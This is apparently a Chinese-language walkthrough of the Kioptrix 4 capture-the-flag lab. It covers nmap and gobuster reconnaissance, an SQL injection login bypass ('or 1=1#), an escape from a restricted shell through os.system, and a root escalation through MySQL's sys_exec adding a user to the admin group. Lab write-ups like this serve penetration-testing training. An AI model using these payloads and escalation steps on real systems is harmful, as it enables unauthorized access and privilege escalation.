kioptrix4(SQL注入漏洞，limited shell)

环境准备

靶机链接：百度网盘 请输入提取码

提取码：hjpd

虚拟机网络链接模式：桥接模式

攻击机系统：kali linux 2021.1

下载后操作：将靶机3的kioptrix3.vmx复制到4里，然后打开kioptrix3.vmx文件，把kioptrix3全部替换成kioptrix4_vmware保存即可！

信息收集

1.通过nmap探测目标靶机开放端口和服务情况

nmap -p- -A -T4 192.168.1.101

2.gobuster扫描网站目录

gobuster dir -u http://192.168.1.101 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 \ -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.访问网页，是登录界面尝试sql注入

2.用户名密码都输入' 出现下面页面 说明有SQL注入漏洞

3.输入 'or 1=1# 报账户问题，那就找用户名来试试

4.把用户输入john 密码为' or 1=1 # 成功登录，得到密码MyNameIsJohn

权限提升

1.登录ssh之后，发现无法执行命令

ssh john@192.168.1.101

2.echo $SHELL 查看当前系统默认的shell ，去谷歌查报错，发现是limited shell

forbidden path -> "/bin/kshell"

3.输入下面命令，

echo os.system('/bin/bash')

4.没有可利用信息

find / -perm -u=s -type f 2>/dev/null

5.ps -ef查看下进程，发现mysql是以root身份开启的，正常是以mysql开启的，应该是要调用系统命令的

6.去网站目录下查看，发现php文件有用户名密码。

7.mysql -uroot

8.利用sys_exec()把用户john分配到admin组里

select sys_exec('usermod -a -G admin john');

9.加入到admin组，就可以执行sudo sudo /bin/bash